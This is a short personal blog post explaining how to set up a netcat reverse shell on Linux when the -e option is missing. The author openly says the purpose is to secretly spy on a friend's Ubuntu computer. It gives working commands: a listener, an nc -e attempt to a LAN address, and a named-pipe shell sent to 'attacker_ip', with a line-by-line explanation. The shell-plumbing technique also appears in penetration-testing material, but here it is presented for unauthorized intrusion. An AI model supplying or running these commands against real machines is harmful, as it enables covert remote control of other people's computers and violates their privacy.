Creating a netcat reverse shell without -e

Shadow Slayer
3 min readJan 25, 2020

So it all began when one day I was just thinking to spy on my friend’s Ubuntu pc to check what kind stuff he has (obviously NSFW stuff )

So my first approach was to set a Netcat reverse proxy shell but I was greeted with an error of

nc -e /bin/sh 192.168.0.83 4444
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]
[destination] [port]

and it was kinda like WHAAAAAAATTTTTT!!!!!!!!!!!
I know kinda overkill reaction
so I wandered off the wild cyberspace for my answer ,

but all I got was failure

As in the traditional Netcat, if the well-named GAPING_SECURITY_HOLE option isn't defined in the Netcat source when it is compiled, your resulting Netcat executable won't support -e

So what now , do I have to loss my hope to spy on my friend or try hard

So after a time , I found way which uses netcat relay as it will relay the victim shell to the attacker netcat client
So here it goes

Before anything start the attacker netcat listener

nc -nvlp 4444

Now in the victim pc

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipe

and voila

So how it works

Here, I’ve first created a named pipe (AKA FIFO) called backpipe using the mknod command. The mknod command will create things in the file system, and here I’m creating something called “backpipe” that is of type “p”, which is a named pipe. This FIFO will be used to shuttle data back to our shell’s input. I created my backpipe in /tmp because pretty much any account is allowed to write there.

Then, I invoke my shell (/bin/sh), the most common shell available on all kinds of Linux distros , pulling its Standard Input from the backpipe (0</tmp/backpipe). I pipe the output of /bin/sh (|) to my Netcat client. That Netcat client connects to the attacker client on port 4444 (nc attacker_ip 4444). I then take Netcat’s Standard Output and dump it into the backpipe (1>/tmp/backpipe). On most shells, you can dispense with the 0< and 1> syntax, but on occasion, I’ve seen some weird shells where it doesn’t work unless you use 0< and 1>. I always throw them in, just to make sure it’ll work.

That’s all

Source : https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

--

--

Shadow Slayer

"It is not wise to judge others based on your own preconceptions and by their appearances."